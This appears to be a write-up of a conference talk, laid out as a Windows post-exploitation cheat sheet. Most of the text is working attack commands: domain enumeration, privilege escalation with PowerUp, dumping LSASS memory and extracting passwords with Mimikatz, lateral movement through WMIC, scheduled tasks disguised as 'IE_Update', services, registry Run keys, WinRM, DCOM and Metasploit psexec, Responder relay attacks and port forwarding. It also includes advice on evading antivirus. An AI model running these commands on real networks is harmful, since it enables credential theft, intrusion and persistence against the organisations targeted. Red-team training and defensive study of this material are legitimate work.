SleepZ3R0 and HA12TL3Y step forward to share some knowledge regarding what to do after an initial compromise. Initial access is typically obtained through phishing or physical attacks, such as a USB Rubber Ducky, which masquerades as a keyboard with payloads that are auto-typed on device connection. Initial recon once on a compromised system, lateral movement, port forwarding, tradecraft evasion, and tools in use at the time of the talk are discussed.
Initial Recon
Commands below are intended to answer questions such as who am I on this network, where am I on this network, can I move to another system with current permissions, and can I get system on my current compromised system.
Group and User Enumeration
net user #local user accounts
net user /domain #all domain accounts
net group "Domain Admins" /domain #all domain admins in the domain
net group /domain #all groups in the domain
net localgroup /domain #local group membership on the domain controller
System Information
hostname #system name
ipconfig /all #network info
whoami /all #user context
net start #started services
netsh firewall show state #firewall state
netsh firewall show config #firewall config
route print #route info
netstat -ano #show tcp and udp network connections in order by PID
wmic qfe #patch info
tasklist /svc #running processes
set #system info
echo %logonserver% #echo the domain controller
echo %username% #echo current user context
arp -a #address resolution protocol table (layer 2)
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #operating system info
driverquery #list loaded drivers
schtasks /query /fo LIST /v #list all scheduled tasks and their config
Privilege Escalation
Commands in this section help with escalating permissions from a lower privileged user on a system to a higher privileged user on this system. While some of the commodity tools listed are detected by anti-virus, the scripts themselves are a road to perform manual analysis or find a variant of the script that is written in a programming language not currently detected by anti-virus.
PowerSploit’s PowerUp
A PowerShell script with C# versions out there to help with privilege escalation on Windows.
import-powershell
#select the PowerUp.ps1 script #check out https://github.com/GhostPack for this is C#
powershell invoke-allchecks
Mimikatz Extraction with SysInternals
procdump.exe -ma lsass.exe minidump #dump lsass with sysinternals procdump
mimikatz.exe #on your local host for offline analysis
sekurlsa::Minidump minidump.dmp #target the mini dump from the other host
sekurlsa::logonPasswords #retrieve password from the memory image
BloodHound
Invoke-Bloodhound -CollectionMethod All
Lateral Movement through Remote Code Execution
WMIC to Run a Local Command
wmic /node:$target process call create "C:\windows\temp\file.exe"
Create, Run, and Delete a Scheduled Task
schtasks /create /tn 'IE_Update' /tr c:\file.exe /sc once /st 00:00 /s $target /RU system
schtasks /run /tn 'IE_Update' /s $target
schtasks /F /delete /tn IE_Update /s $target
Create, Start, and Delete a Service
sc \\$target create $name binpath="C:\windows\temp\file.exe"
sc \\$target start $name
sc \\$target delete $name
Metasploit
msfconsole
use exploit/windows/smb/psexec_psh
WinRM over TCP/5985 or TCP/5986
Invoke-Command -ComputerName $target -ScriptBlock { commands }
winrs -r:http://$target/wsman "$command"
Create a Registery Key and Use It
REG ADD "\\$comp\HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v wolf /t REG_SZ /d "C:\windows\temp\file.exe"
shutdown /m \\$target -r -f -t 0
DCOM
dcomexec.py $domain/$user:$password@$target $command
Responder and Inveigh LLMNR / NBNS / WPAD Shenanigans
./Responder.py -I eth0 -Ffwbrd #run responder
python RunFinger.py -i $targets #enumerate domain, os, and smb signing status
Responder with MultiRelay
vi Responder.conf #turn off http and smb in responder.conf to use multirelay
python MultiRelay.py -t $targets -u ALL #forward to the targets rerturned with RunFinger.py and target all users
Port Forwarding Techniques
SSH
ssh -L 8080:$internal_target:80 user@$compromised_machine
Meterpreter
portfwd add -l $local_port -r $remote_target -p $remote_port
Plink
plink.exe {host-B} -P 22 -C -L 127.0.0.1:$local_port:{host-C}:3389 -l $username -pw $password
Proxychains
proxychains nmap -p 22,445,3389 -Pn $internal_network #edit proxychains.conf to point towards SOCKS server on compromised host